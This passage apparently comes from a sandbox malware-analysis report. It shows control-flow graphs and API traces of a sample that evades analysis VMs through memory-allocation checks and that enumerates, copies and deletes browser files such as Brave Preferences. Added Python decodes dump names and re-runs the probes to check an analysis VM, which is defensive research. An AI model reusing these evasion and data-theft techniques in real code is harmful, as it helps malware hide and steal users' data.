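        print(name, len(nodes), "blocks,", len(edges), "edges")
        print("  exit decided by:", exit_decisions(nodes, edges))
        print("  dispatch blocks:", dispatch_blocks(nodes, edges))
```

On the e410c0 graph the exit block 2891 is fed only by 2889 (the block that calls GlobalMemoryStatusEx), 2892 and 2894, so the comparison on the returned MEMORYSTATUSEX is what decides the exit; on the e58c88 graph the single gate is the StrCmpCA block 2895, after which block 2906 at e58cff fans out into thirteen cases.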

                                Control-flow Graph

                                control_flow_graph
                                Basic blocks (id, address range, API or call made in the block):
                                • 2895 e58c88-e58cc4 StrCmpCA
                                • 2897 e58cc6-e58cc7 ExitProcess
                                • 2898 e58ccd-e58ce6
                                • 2900 e58ee2-e58eef call e42a20
                                • 2901 e58cec-e58cf1
                                • 2903 e58cf6-e58cf9
                                • 2905 e58ec3-e58edc
                                • 2906 e58cff
                                • 2907 e58d84-e58d92 StrCmpCA
                                • 2908 e58da4-e58db8 StrCmpCA
                                • 2909 e58d06-e58d15 lstrlen
                                • 2910 e58e6f-e58e7d StrCmpCA
                                • 2911 e58e88-e58e9a lstrlen
                                • 2912 e58e56-e58e64 StrCmpCA
                                • 2913 e58d30-e58d3f lstrlen
                                • 2914 e58dbd-e58dcb StrCmpCA
                                • 2915 e58ddd-e58deb StrCmpCA
                                • 2916 e58dfd-e58e0b StrCmpCA
                                • 2917 e58e1d-e58e2b StrCmpCA
                                • 2918 e58e3d-e58e4b StrCmpCA
                                • 2919 e58d5a-e58d69 lstrlen
                                • 2920 e58d17-e58d1c call e42a20
                                • 2921 e58d1f-e58d2b call e42930
                                • 2922 e58e4d-e58e54
                                • 2923 e58e66-e58e6d
                                • 2924 e58e7f-e58e86
                                • 2925 e58ea4-e58eb0 call e42930
                                • 2926 e58e9c-e58ea1 call e42a20
                                • 2927 e58d41-e58d46 call e42a20
                                • 2928 e58d49-e58d55 call e42930
                                • 2929 e58d73-e58d7f call e42930
                                • 2930 e58d6b-e58d70 call e42a20
                                • 2932 e58d98-e58d9f
                                • 2933 e58dd1-e58dd8
                                • 2934 e58df1-e58df8
                                • 2935 e58e11-e58e18
                                • 2936 e58e31-e58e38
                                • 2945 e58cf3
                                • 2954 e58eb3-e58eb5
                                • 2955 e58eb7-e58eb9
                                • 2956 e58ebb-e58ebd lstrcpy
                                Edges (source -> successors):
                                • 2895 -> 2897, 2898
                                • 2898 -> 2900, 2901
                                • 2901 -> 2903
                                • 2903 -> 2905, 2906
                                • 2905 -> 2900, 2945
                                • 2906 -> 2907, 2908, 2909, 2910, 2911, 2912, 2913, 2914, 2915, 2916, 2917, 2918, 2919
                                • 2907 -> 2905, 2932
                                • 2908 -> 2905
                                • 2909 -> 2920, 2921
                                • 2910 -> 2905, 2924
                                • 2911 -> 2925, 2926
                                • 2912 -> 2905, 2923
                                • 2913 -> 2927, 2928
                                • 2914 -> 2905, 2933
                                • 2915 -> 2905, 2934
                                • 2916 -> 2905, 2935
                                • 2917 -> 2905, 2936
                                • 2918 -> 2905, 2922
                                • 2919 -> 2929, 2930
                                • 2920 -> 2921
                                • 2921 -> 2954
                                • 2922 -> 2905
                                • 2923 -> 2905
                                • 2924 -> 2905
                                • 2925 -> 2954
                                • 2926 -> 2925
                                • 2927 -> 2928
                                • 2928 -> 2954
                                • 2929 -> 2954
                                • 2930 -> 2929
                                • 2932 -> 2905
                                • 2933 -> 2905
                                • 2934 -> 2905
                                • 2935 -> 2905
                                • 2936 -> 2905
                                • 2945 -> 2903
                                • 2954 -> 2905, 2955
                                • 2955 -> 2905, 2956
                                • 2956 -> 2905
                                Memory Dump Source
                                • Source File: 00000001.00000002.1388444729.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                Similarity
                                • API ID: ExitProcess
                                • String ID: block
                                • API String ID: 621844428-2199623458
                                • Opcode ID: ab3a7082d01aa9507a9d88572b3976939b6df985ca8422520b8020d67190b143
                                • Instruction ID: 521e7cee3e636ccaf95d582bd068116a2e2086bed3b46817e12d468b8ad5cd80
                                • Opcode Fuzzy Hash: ab3a7082d01aa9507a9d88572b3976939b6df985ca8422520b8020d67190b143
                                • Instruction Fuzzy Hash: 16E0D86491C34DAFC7319EB59D59CD67B5CCF15200F400569BE445B640E524AE08C3EA
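Each "Memory Dump Source" list in this report names the dumped regions of the mapped image in Joe Sandbox's dotted file-name form. Reading the eight fields as process index, run, dump id, base address, Win32 page protection, an unknown field, memory type and module index is an assumption made here, not documented on the page; it fits the data, though: the PE header page at 0xE40000 is 0x04 (PAGE_READWRITE), the code regions are 0x40 (PAGE_EXECUTE_READWRITE), two regions are 0x80 (PAGE_EXECUTE_WRITECOPY), and 0x01000000 is MEM_IMAGE, which lines up with the "Detected unpacking (changes PE section rights)" verdict. The Python below is an added example, not the report's own tooling: it decodes the seventeen names listed above and reports which image regions were writable and executable when they were dumped. The span of each region is estimated as the distance to the next dumped base, which is an assumption as well.

```python
"""Decode Joe Sandbox memory-dump file names and flag writable+executable image
regions. Added example; field meanings are an assumption inferred from this report."""
import re
from collections import Counter

# The seventeen names from the "Memory Dump Source" list of this report.
DUMP_NAMES = [
    "00000001.00000002.1388444729.0000000000E41000.00000040.00000001.01000000.00000003.sdmp",
    "00000001.00000002.1388428212.0000000000E40000.00000004.00000001.01000000.00000003.sdmp",
    "00000001.00000002.1388444729.0000000000E77000.00000040.00000001.01000000.00000003.sdmp",
    "00000001.00000002.1388444729.0000000000ECE000.00000040.00000001.01000000.00000003.sdmp",
    "00000001.00000002.1388444729.0000000000ED6000.00000040.00000001.01000000.00000003.sdmp",
    "00000001.00000002.1388444729.0000000000EEF000.00000040.00000001.01000000.00000003.sdmp",
    "00000001.00000002.1388444729.0000000001078000.00000040.00000001.01000000.00000003.sdmp",
    "00000001.00000002.1388596614.000000000108A000.00000004.00000001.01000000.00000003.sdmp",
    "00000001.00000002.1388610685.000000000108C000.00000040.00000001.01000000.00000003.sdmp",
    "00000001.00000002.1388610685.0000000001222000.00000040.00000001.01000000.00000003.sdmp",
    "00000001.00000002.1388610685.00000000012FF000.00000040.00000001.01000000.00000003.sdmp",
    "00000001.00000002.1388610685.0000000001328000.00000040.00000001.01000000.00000003.sdmp",
    "00000001.00000002.1388610685.000000000132F000.00000040.00000001.01000000.00000003.sdmp",
    "00000001.00000002.1388610685.000000000133E000.00000040.00000001.01000000.00000003.sdmp",
    "00000001.00000002.1388848396.000000000133F000.00000080.00000001.01000000.00000003.sdmp",
    "00000001.00000002.1388969574.00000000014E2000.00000040.00000001.01000000.00000003.sdmp",
    "00000001.00000002.1388987390.00000000014E3000.00000080.00000001.01000000.00000003.sdmp",
]

# Win32 constants (winnt.h); the mapping of fields 5 and 7 onto them is the assumption.
PAGE_PROTECT = {0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
                0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
                0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY"}
MEM_TYPE = {0x20000: "MEM_PRIVATE", 0x40000: "MEM_MAPPED", 0x1000000: "MEM_IMAGE"}

_NAME = re.compile(r"^([0-9A-F]{8})\.([0-9A-F]{8})\.(\d+)\.([0-9A-F]{16})\."
                   r"([0-9A-F]{8})\.([0-9A-F]{8})\.([0-9A-F]{8})\.([0-9A-F]{8})\.sdmp$")


def parse_dump_name(name):
    """Split one .sdmp name into its (assumed) fields and decode the constants."""
    m = _NAME.match(name)
    if not m:
        raise ValueError(f"not a Joe Sandbox dump name: {name}")
    proc, run, dump_id, base, protect, field6, mtype, module = m.groups()
    protect_v, type_v = int(protect, 16), int(mtype, 16)
    return {"process": int(proc, 16), "run": int(run, 16), "dump_id": int(dump_id),
            "base": int(base, 16), "protect": protect_v,
            "protect_name": PAGE_PROTECT.get(protect_v & 0xFF, hex(protect_v)),
            "field6": int(field6, 16), "type": MEM_TYPE.get(type_v, hex(type_v)),
            "module": int(module, 16)}


def region_map(names):
    """Regions sorted by base; span = gap to the next dumped base (None for the last)."""
    regs = sorted((parse_dump_name(n) for n in names), key=lambda r: r["base"])
    for cur, nxt in zip(regs, regs[1:]):
        cur["span"] = nxt["base"] - cur["base"]
    regs[-1]["span"] = None
    return regs


def rwx_regions(names):
    """Bases of image regions dumped as PAGE_EXECUTE_READWRITE: these are the
    pages an unpacker wrote to and then executed (or re-protected for that)."""
    return [r["base"] for r in region_map(names)
            if r["protect"] == 0x40 and r["type"] == "MEM_IMAGE"]


def summarize(names):
    """Count of dumped regions per decoded page protection."""
    return dict(Counter(parse_dump_name(n)["protect_name"] for n in names))


if __name__ == "__main__":
    for r in region_map(DUMP_NAMES):
        span = "?" if r["span"] is None else hex(r["span"])
        print(f"{r['base']:#010x} span {span:>9} {r['protect_name']:<24} {r['type']}")
    print(summarize(DUMP_NAMES))
```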
                                APIs
                                • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00E41046
                                • VirtualAllocExNuma.KERNEL32(00000000), ref: 00E4104D
                                • ExitProcess.KERNEL32 ref: 00E41058
                                • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 00E4106C
                                • VirtualFree.KERNEL32(00000000,17C841C0,00008000), ref: 00E410AB
                                Memory Dump Source
                                • Source File: 00000001.00000002.1388444729.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                Similarity
                                • API ID: Virtual$AllocProcess$CurrentExitFreeNuma
                                • String ID:
                                • API String ID: 3477276466-0
                                • Opcode ID: 260b0117852eba75402ae8e689ecb97103a5cba9287088da2efa1cea80d29ca1
                                • Instruction ID: f26b95707afe3ff1c08a6f6abde673efaf977e3fa57927052f52e192b0b1183f
                                • Opcode Fuzzy Hash: 260b0117852eba75402ae8e689ecb97103a5cba9287088da2efa1cea80d29ca1
                                • Instruction Fuzzy Hash: F3E08670B983943FF53306619C0EF163A2C5741B14F004055F385FA0C2D59AA5048A75
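Read together, the five calls above are an anti-sandbox memory probe. The argument list the report attaches to GetCurrentProcess is the stack already prepared for the VirtualAllocExNuma call that follows (lpAddress NULL, 0x7D0 bytes, 0x3000 = MEM_COMMIT|MEM_RESERVE, 0x40 = PAGE_EXECUTE_READWRITE, NUMA node 0), ExitProcess sits on its failure branch, and the sample then commits 0x17C841C0 bytes (399,000,000, about 380 MiB) as PAGE_READWRITE before calling VirtualFree with MEM_RELEASE (0x8000). VirtualAllocExNuma is missing from some emulators, and a 380 MiB commit fails on an analysis VM given little memory. The GlobalMemoryStatusEx block at e410c0 earlier in this section is the companion check; its "@" String ID is most likely the 0x40 (64) dwLength written into MEMORYSTATUSEX, since sizeof(MEMORYSTATUSEX) is 64. The Python below is an added example, not the report's or the sample's code: run on the Windows analysis VM it repeats the same calls with the same parameters and reports whether this host would pass them. The threshold the sample applies to the GlobalMemoryStatusEx result is not visible in this section, so the script prints the values and does not judge them; the decoding helpers are portable and the Win32 calls only run on Windows.

```python
"""Repeat the memory probes this sample runs before unpacking so an analysis VM
can be checked against them. Added example; parameters come from the report's
API trace, the Win32 calls need Windows, the helpers run anywhere."""
import ctypes
import sys

MEM_COMMIT, MEM_RESERVE, MEM_RELEASE = 0x1000, 0x2000, 0x8000
PAGE_PROTECT = {0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
                0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
                0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY"}

# From the trace: VirtualAllocExNuma(hCurrentProcess, NULL, 0x7D0, 0x3000, 0x40, 0)
# at 00E4104D and VirtualAlloc(NULL, 0x17C841C0, 0x3000, 0x04) at 00E4106C.
NUMA_PROBE = {"size": 0x7D0, "alloc_type": 0x3000, "protect": 0x40, "node": 0}
BIG_PROBE = {"size": 0x17C841C0, "alloc_type": 0x3000, "protect": 0x04}


def decode_alloc_type(flags):
    """Names for the MEM_* allocation-type bits; unknown bits are kept as hex."""
    names = [n for bit, n in ((MEM_COMMIT, "MEM_COMMIT"), (MEM_RESERVE, "MEM_RESERVE"))
             if flags & bit]
    rest = flags & ~(MEM_COMMIT | MEM_RESERVE)
    return names + ([hex(rest)] if rest else [])


def decode_protect(protect):
    return PAGE_PROTECT.get(protect & 0xFF, hex(protect))


def probe_size_mib(size):
    return size / 2 ** 20


class MEMORYSTATUSEX(ctypes.Structure):
    # DWORD / ULONGLONG widths spelled out so the struct is 64 bytes on any host.
    _fields_ = [("dwLength", ctypes.c_uint32), ("dwMemoryLoad", ctypes.c_uint32),
                ("ullTotalPhys", ctypes.c_uint64), ("ullAvailPhys", ctypes.c_uint64),
                ("ullTotalPageFile", ctypes.c_uint64), ("ullAvailPageFile", ctypes.c_uint64),
                ("ullTotalVirtual", ctypes.c_uint64), ("ullAvailVirtual", ctypes.c_uint64),
                ("ullAvailExtendedVirtual", ctypes.c_uint64)]


def memorystatusex_size():
    """64 == 0x40 == '@': the dwLength the sample must store before the call."""
    return ctypes.sizeof(MEMORYSTATUSEX)


def run_probes():
    """Windows only: returns the outcome of each probe as a dict."""
    if sys.platform != "win32":
        raise RuntimeError("the kernel32 probes must run on the Windows analysis VM")
    k32 = ctypes.WinDLL("kernel32", use_last_error=True)
    k32.GetCurrentProcess.restype = ctypes.c_void_p
    k32.VirtualAllocExNuma.restype = ctypes.c_void_p
    k32.VirtualAllocExNuma.argtypes = [ctypes.c_void_p, ctypes.c_void_p, ctypes.c_size_t,
                                       ctypes.c_uint32, ctypes.c_uint32, ctypes.c_uint32]
    k32.VirtualAlloc.restype = ctypes.c_void_p
    k32.VirtualAlloc.argtypes = [ctypes.c_void_p, ctypes.c_size_t, ctypes.c_uint32, ctypes.c_uint32]
    k32.VirtualFree.restype = ctypes.c_int
    k32.VirtualFree.argtypes = [ctypes.c_void_p, ctypes.c_size_t, ctypes.c_uint32]
    k32.GlobalMemoryStatusEx.restype = ctypes.c_int
    k32.GlobalMemoryStatusEx.argtypes = [ctypes.POINTER(MEMORYSTATUSEX)]

    out = {}
    p = k32.VirtualAllocExNuma(k32.GetCurrentProcess(), None, NUMA_PROBE["size"],
                               NUMA_PROBE["alloc_type"], NUMA_PROBE["protect"], NUMA_PROBE["node"])
    out["numa_alloc_ok"] = bool(p)  # NULL here is the branch on which the sample exits
    if p:
        k32.VirtualFree(p, 0, MEM_RELEASE)
    p = k32.VirtualAlloc(None, BIG_PROBE["size"], BIG_PROBE["alloc_type"], BIG_PROBE["protect"])
    out["big_alloc_ok"] = bool(p)
    if p:
        k32.VirtualFree(p, 0, MEM_RELEASE)  # dwSize must be 0 with MEM_RELEASE
    ms = MEMORYSTATUSEX(dwLength=memorystatusex_size())
    if k32.GlobalMemoryStatusEx(ctypes.byref(ms)):
        out["total_phys_mib"] = ms.ullTotalPhys // 2 ** 20
        out["avail_phys_mib"] = ms.ullAvailPhys // 2 ** 20
    return out


if __name__ == "__main__":
    print("NUMA probe:", decode_alloc_type(NUMA_PROBE["alloc_type"]), decode_protect(NUMA_PROBE["protect"]))
    print(f"big probe: {probe_size_mib(BIG_PROBE['size']):.1f} MiB", decode_protect(BIG_PROBE["protect"]))
    for k, v in run_probes().items():
        print(f"{k}: {v}")
```

One detail of the trace worth noting: the VirtualFree call is listed with dwSize 0x17C841C0 together with MEM_RELEASE, and the API requires dwSize to be 0 for MEM_RELEASE, so that call fails with ERROR_INVALID_PARAMETER and the 380 MiB stay committed until the process exits; the example releases the block properly.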
                                APIs
                                • lstrcpy.KERNEL32(00000000,00E6CFEC), ref: 00E523D4
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E523F7
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00E52402
                                • lstrlen.KERNEL32(\*.*), ref: 00E5240D
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E5242A
                                • lstrcat.KERNEL32(00000000,\*.*), ref: 00E52436
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E5246A
                                • FindFirstFileA.KERNEL32(00000000,?), ref: 00E52486
                                Memory Dump Source
                                • Source File: 00000001.00000002.1388444729.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                Similarity
                                • API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
                                • String ID: \*.*
                                • API String ID: 2567437900-1173974218
                                • Opcode ID: 89ec1364a0b384e0025d72ac28c96a611eb66ef81732400e2ba8cca37b558da0
                                • Instruction ID: bca8944be9144fbf66305d0de0987efa9f6fb73a0c8b91a819ace5aec1bc94dc
                                • Opcode Fuzzy Hash: 89ec1364a0b384e0025d72ac28c96a611eb66ef81732400e2ba8cca37b558da0
                                • Instruction Fuzzy Hash: 08A28031A112169FCB21AF78EC49AAE77F8AF45319F04A42CFE45B7245DB34DD058BA0
                                APIs
                                • lstrcpy.KERNEL32(00000000,00E6CFEC), ref: 00E416E2
                                • lstrcpy.KERNEL32(00000000,00E6CFEC), ref: 00E41719
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E4176C
                                • lstrcat.KERNEL32(00000000), ref: 00E41776
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E417A2
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E417EF
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00E417F9
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E41825
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E41875
                                • lstrcat.KERNEL32(00000000), ref: 00E4187F
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E418AB
                                • lstrcpy.KERNEL32(00000000,?), ref: 00E418F3
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00E418FE
                                • lstrlen.KERNEL32(00E71794), ref: 00E41909
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E41929
                                • lstrcat.KERNEL32(00000000,00E71794), ref: 00E41935
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E4195B
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00E41966
                                • lstrlen.KERNEL32(\*.*), ref: 00E41971
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E4198E
                                • lstrcat.KERNEL32(00000000,\*.*), ref: 00E4199A
                                  • Part of subcall function 00E64040: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,00000000), ref: 00E6406D
                                  • Part of subcall function 00E64040: lstrcpy.KERNEL32(00000000,?), ref: 00E640A2
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E419C3
                                • lstrcpy.KERNEL32(00000000,?), ref: 00E41A0E
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00E41A16
                                • lstrlen.KERNEL32(00E71794), ref: 00E41A21
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E41A41
                                • lstrcat.KERNEL32(00000000,00E71794), ref: 00E41A4D
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E41A76
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00E41A81
                                • lstrlen.KERNEL32(00E71794), ref: 00E41A8C
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E41AAC
                                • lstrcat.KERNEL32(00000000,00E71794), ref: 00E41AB8
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E41ADE
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00E41AE9
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E41B11
                                • FindFirstFileA.KERNEL32(00000000,?), ref: 00E41B45
                                • StrCmpCA.SHLWAPI(?,00E717A0), ref: 00E41B70
                                • StrCmpCA.SHLWAPI(?,00E717A4), ref: 00E41B8A
                                • lstrcpy.KERNEL32(00000000,00E6CFEC), ref: 00E41BC4
                                • lstrcpy.KERNEL32(00000000,?), ref: 00E41BFB
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00E41C03
                                • lstrlen.KERNEL32(00E71794), ref: 00E41C0E
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E41C31
                                • lstrcat.KERNEL32(00000000,00E71794), ref: 00E41C3D
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E41C69
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00E41C74
                                • lstrlen.KERNEL32(00E71794), ref: 00E41C7F
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E41CA2
                                • lstrcat.KERNEL32(00000000,00E71794), ref: 00E41CAE
                                • lstrlen.KERNEL32(?), ref: 00E41CBB
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E41CDB
                                • lstrcat.KERNEL32(00000000,?), ref: 00E41CE9
                                • lstrlen.KERNEL32(00E71794), ref: 00E41CF4
                                • lstrcpy.KERNEL32(00000000,?), ref: 00E41D14
                                • lstrcat.KERNEL32(00000000,00E71794), ref: 00E41D20
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E41D46
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00E41D51
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E41D7D
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E41DE0
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00E41DEB
                                • lstrlen.KERNEL32(00E71794), ref: 00E41DF6
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E41E19
                                • lstrcat.KERNEL32(00000000,00E71794), ref: 00E41E25
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E41E4B
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00E41E56
                                • lstrlen.KERNEL32(00E71794), ref: 00E41E61
                                • lstrcpy.KERNEL32(00000000,?), ref: 00E41E81
                                • lstrcat.KERNEL32(00000000,00E71794), ref: 00E41E8D
                                • lstrlen.KERNEL32(?), ref: 00E41E9A
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E41EBA
                                • lstrcat.KERNEL32(00000000,?), ref: 00E41EC8
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E41EF4
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E41F3E
                                • GetFileAttributesA.KERNEL32(00000000), ref: 00E41F45
                                • lstrcpy.KERNEL32(00000000,00E6CFEC), ref: 00E41F9F
                                • lstrlen.KERNEL32(016C88F8), ref: 00E41FAE
                                • lstrcpy.KERNEL32(00000000,?), ref: 00E41FDB
                                • lstrcat.KERNEL32(00000000,?), ref: 00E41FE3
                                • lstrlen.KERNEL32(00E71794), ref: 00E41FEE
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E4200E
                                • lstrcat.KERNEL32(00000000,00E71794), ref: 00E4201A
                                • lstrcpy.KERNEL32(00000000,?), ref: 00E42042
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00E4204D
                                • lstrlen.KERNEL32(00E71794), ref: 00E42058
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E42075
                                • lstrcat.KERNEL32(00000000,00E71794), ref: 00E42081
                                Memory Dump Source
                                • Source File: 00000001.00000002.1388444729.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                Similarity
                                • API ID: lstrcpy$lstrcat$lstrlen$File$AttributesFindFirstFolderPath
                                • String ID: \*.*
                                • API String ID: 4127656590-1173974218
                                • Opcode ID: 53ffb024dfbdc4c4e49ebf967e300ce77f95d70af9c2ef655a0e822995c036d3
                                • Instruction ID: fbd6e353b55d9058018fc48991dd282a10670866ede3915ddaa567ac66215c07
                                • Opcode Fuzzy Hash: 53ffb024dfbdc4c4e49ebf967e300ce77f95d70af9c2ef655a0e822995c036d3
                                • Instruction Fuzzy Hash: 36929F3191121A9BCF21EF64FC88AAE77F9AF44318F446068FA45B7205DB35ED45CBA0
                                APIs
                                • lstrcpy.KERNEL32(00000000,00E6CFEC), ref: 00E4DBC1
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E4DBE4
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00E4DBEF
                                • lstrlen.KERNEL32(00E74CA8), ref: 00E4DBFA
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E4DC17
                                • lstrcat.KERNEL32(00000000,00E74CA8), ref: 00E4DC23
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E4DC4C
                                • lstrcpy.KERNEL32(00000000,00E6CFEC), ref: 00E4DC8F
                                • lstrcpy.KERNEL32(00000000,00E6CFEC), ref: 00E4DCBF
                                • FindFirstFileA.KERNEL32(00000000,?), ref: 00E4DCD0
                                • StrCmpCA.SHLWAPI(?,00E717A0), ref: 00E4DCF0
                                • StrCmpCA.SHLWAPI(?,00E717A4), ref: 00E4DD0A
                                • lstrlen.KERNEL32(00E6CFEC), ref: 00E4DD1D
                                • lstrcpy.KERNEL32(00000000,00E6CFEC), ref: 00E4DD47
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E4DD70
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00E4DD7B
                                • lstrlen.KERNEL32(00E71794), ref: 00E4DD86
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E4DDA3
                                • lstrcat.KERNEL32(00000000,00E71794), ref: 00E4DDAF
                                • lstrlen.KERNEL32(?), ref: 00E4DDBC
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E4DDDF
                                • lstrcat.KERNEL32(00000000,?), ref: 00E4DDED
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E4DE19
                                • lstrlen.KERNEL32(00E71794), ref: 00E4DE3D
                                • lstrcpy.KERNEL32(00000000,?), ref: 00E4DE6F
                                • lstrcat.KERNEL32(00000000,00E71794), ref: 00E4DE7B
                                • lstrlen.KERNEL32(016C8B48), ref: 00E4DE8A
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E4DEB0
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00E4DEBB
                                • lstrlen.KERNEL32(00E71794), ref: 00E4DEC6
                                • lstrcpy.KERNEL32(00000000,?), ref: 00E4DEE6
                                • lstrcat.KERNEL32(00000000,00E71794), ref: 00E4DEF2
                                • lstrlen.KERNEL32(016C89A8), ref: 00E4DF01
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E4DF27
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00E4DF32
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E4DF5E
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E4DFA5
                                • lstrcat.KERNEL32(00000000,00E71794), ref: 00E4DFB1
                                • lstrlen.KERNEL32(016C8B48), ref: 00E4DFC0
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E4DFE9
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00E4DFF4
                                • lstrlen.KERNEL32(00E71794), ref: 00E4DFFF
                                • lstrcpy.KERNEL32(00000000,?), ref: 00E4E022
                                • lstrcat.KERNEL32(00000000,00E71794), ref: 00E4E02E
                                • lstrlen.KERNEL32(016C89A8), ref: 00E4E03D
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E4E063
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00E4E06E
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E4E09A
                                • StrCmpCA.SHLWAPI(?,Brave), ref: 00E4E0CD
                                • StrCmpCA.SHLWAPI(?,Preferences), ref: 00E4E0E7
                                • lstrcpy.KERNEL32(00000000,00E6CFEC), ref: 00E4E11F
                                • lstrlen.KERNEL32(016CD8E0), ref: 00E4E12E
                                • lstrcpy.KERNEL32(00000000,?), ref: 00E4E155
                                • lstrcat.KERNEL32(00000000,?), ref: 00E4E15D
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E4E19F
                                • lstrcat.KERNEL32(00000000), ref: 00E4E1A9
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E4E1D0
                                • CopyFileA.KERNEL32(00000000,?,00000001), ref: 00E4E1F9
                                • lstrcpy.KERNEL32(00000000,00E6CFEC), ref: 00E4E22F
                                • lstrlen.KERNEL32(016C88F8), ref: 00E4E23D
                                • lstrcpy.KERNEL32(00000000,?), ref: 00E4E261
                                • lstrcat.KERNEL32(00000000,016C88F8), ref: 00E4E269
                                • lstrlen.KERNEL32(\Brave\Preferences), ref: 00E4E274
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E4E29B
                                • lstrcat.KERNEL32(00000000,\Brave\Preferences), ref: 00E4E2A7
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E4E2CF
                                • lstrcpy.KERNEL32(00000000,?), ref: 00E4E30F
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E4E349
                                • DeleteFileA.KERNEL32(?), ref: 00E4E381
                                • StrCmpCA.SHLWAPI(?,016CD850), ref: 00E4E3AB
                                • lstrcpy.KERNEL32(00000000,?), ref: 00E4E3F4
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E4E41C
                                • lstrcpy.KERNEL32(00000000,?), ref: 00E4E445
                                • StrCmpCA.SHLWAPI(?,016C89A8), ref: 00E4E468
                                • StrCmpCA.SHLWAPI(?,016C8B48), ref: 00E4E47D
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E4E4D9
                                • GetFileAttributesA.KERNEL32(00000000), ref: 00E4E4E0
                                • StrCmpCA.SHLWAPI(?,016CD790), ref: 00E4E58E
                                • lstrcpy.KERNEL32(00000000,00E6CFEC), ref: 00E4E5C4
                                • CopyFileA.KERNEL32(00000000,?,00000001), ref: 00E4E639
                                • lstrcpy.KERNEL32(00000000,?), ref: 00E4E678
                                • lstrcpy.KERNEL32(00000000,?), ref: 00E4E6A1
                                • lstrcpy.KERNEL32(00000000,?), ref: 00E4E6C7
